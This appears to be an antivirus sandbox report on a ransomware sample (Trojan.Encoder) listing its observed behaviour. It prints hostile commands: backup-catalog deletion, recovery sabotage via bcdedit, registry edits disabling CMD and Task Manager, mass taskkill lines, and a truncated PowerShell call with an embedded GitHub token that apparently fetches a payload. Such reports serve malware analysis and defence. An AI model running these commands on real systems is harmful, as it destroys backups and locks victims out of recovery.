Technical Information
Malicious functions
To complicate detection of its presence in the operating system,
blocks execution of the following system utilities:
- Command Prompt (CMD)
- Windows Task Manager (Taskmgr)
blocks the following features:
- System Restore (SR)
deletes volume shadow copies.
Executes the following
- '<SYSTEM32>\taskkill.exe' /F /IM regedit.exe
- '<SYSTEM32>\taskkill.exe' /F /IM powerpnt.exe
- '<SYSTEM32>\taskkill.exe' /F /IM postgres.exe
- '<SYSTEM32>\taskkill.exe' /F /IM taskmgr.exe
- '<SYSTEM32>\taskkill.exe' /F /IM cs2.exe
- '<SYSTEM32>\taskkill.exe' /F /IM sublime_text.exe
- '<SYSTEM32>\taskkill.exe' /F /IM outlook.exe
- '<SYSTEM32>\taskkill.exe' /F /IM windowsterminal.exe
- '<SYSTEM32>\taskkill.exe' /F /IM excel.exe
- '<SYSTEM32>\taskkill.exe' /F /IM virtualbox.exe
- '<SYSTEM32>\taskkill.exe' /F /IM chrome.exe
- '<SYSTEM32>\taskkill.exe' /F /IM msedge.exe
- '<SYSTEM32>\taskkill.exe' /F /IM mspub.exe
- '<SYSTEM32>\taskkill.exe' /F /IM virtualboxvm.exe
- '<SYSTEM32>\taskkill.exe' /F /IM processhacker.exe
- '<SYSTEM32>\taskkill.exe' /F /IM winword.exe
- '<SYSTEM32>\taskkill.exe' /F /IM msaccess.exe
Injects code into
the following system processes:
- <SYSTEM32>\wbengine.exe
- <SYSTEM32>\vds.exe
Reads files which store third party applications passwords
- %HOMEPATH%\desktop\508softwareandos.doc
- %HOMEPATH%\desktop\adhd_and_obesity.docx
- %HOMEPATH%\desktop\aoc_saq_d_v3_merchant.docx
- %HOMEPATH%\desktop\contosoroot_1.cer
- %HOMEPATH%\desktop\fi51.doc
- %HOMEPATH%\desktop\lisp_success.doc
- %HOMEPATH%\desktop\ovp25012015.doc
- %HOMEPATH%\desktop\sdszfo.docx
- %HOMEPATH%\desktop\split.avi
- %HOMEPATH%\desktop\testcertificate.cer
- %HOMEPATH%\desktop\uep_form_786_bulletin_1726i602.doc
Modifies file system
Creates the following files
- %APPDATA%\microsoft\protect\controller
- nul
- %HOMEPATH%\88clgv3j0y3g\v3vpgk3z.key.ekey
- %HOMEPATH%\88clgv3j0y3g\wcq0fzd0.pin.txt
- %HOMEPATH%\88clgv3j0y3g\dpjfsqtk.readme.html
- %HOMEPATH%\88clgv3j0y3g\dpjfsqtk.readme.html.tmp
Moves the following files
- from %HOMEPATH%\88clgv3j0y3g\dpjfsqtk.readme.html.tmp to %HOMEPATH%\88clgv3j0y3g\dpjfsqtk.readme.html
Modifies the following files
- C:\users\public\pictures\sample pictures\chrysanthemum.jpg
- %HOMEPATH%\desktop\lisp_success.doc
- %HOMEPATH%\desktop\fi51.doc
- %HOMEPATH%\desktop\contosoroot_1.cer
- %HOMEPATH%\desktop\aoc_saq_d_v3_merchant.docx
- %HOMEPATH%\desktop\adhd_and_obesity.docx
- %HOMEPATH%\desktop\508softwareandos.doc
- %HOMEPATH%\desktop\ovp25012015.doc
- %HOMEPATH%\contacts\user.contact
- C:\users\public\pictures\sample pictures\penguins.jpg
- C:\users\public\pictures\sample pictures\lighthouse.jpg
- C:\users\public\pictures\sample pictures\koala.jpg
- C:\users\public\pictures\sample pictures\jellyfish.jpg
- C:\users\public\pictures\sample pictures\hydrangeas.jpg
- C:\users\public\pictures\sample pictures\desert.jpg
- C:\users\public\pictures\sample pictures\tulips.jpg
- %HOMEPATH%\desktop\sdszfo.docx
Moves itself
- from <Full path to file> to %APPDATA%\<File name>.exe
Modifies user data files (Trojan.Encoder).
Changes user data files extensions (Trojan.Encoder).
Miscellaneous
Searches for the following windows
- ClassName: '' WindowName: ''
Executes the following
- '<SYSTEM32>\net.exe' session
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM steam.exe
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM cs2.exe
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM postgres.exe
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM outlook.exe
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM mysqlworkbench.exe
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM mysqld.exe
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM taskmgr.exe
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM windowsterminal.exe
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM cmd.exe
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM sublime_text.exe
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM microsoft.photos.exe
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM photosapp.exe
- '<SYSTEM32>\reg.exe' ADD HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 1 /f
- '<SYSTEM32>\sc.exe' stop VBoxSDS
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM virtualbox.exe
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM chrome.exe
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM virtualboxvm.exe
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM mspub.exe
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM msedge.exe
- '<SYSTEM32>\reg.exe' ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f
- '<SYSTEM32>\reg.exe' ADD HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 0 /f
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "$headers = @{ \"Authorization\" = \"token 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\"; \"Accept\" = \"application/vnd.github.v3.raw\" }; Invoke-RestMethod -Uri \"https://api.github...
- '<SYSTEM32>\reg.exe' ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
- '<SYSTEM32>\wbadmin.exe' delete catalog -quiet
- '<SYSTEM32>\bcdedit.exe' /set {default} bootstatuspolicy ignoreallfailures
- '<SYSTEM32>\wbengine.exe'
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM powershell.exe
- '<SYSTEM32>\cmd.exe' /c sc stop VBoxSDS
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM regedit.exe
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM code.exe
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM excel.exe
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM powerpnt.exe
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM winword.exe
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM msaccess.exe
- '<SYSTEM32>\net1.exe' session
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM processhacker.exe
- '<SYSTEM32>\vds.exe'
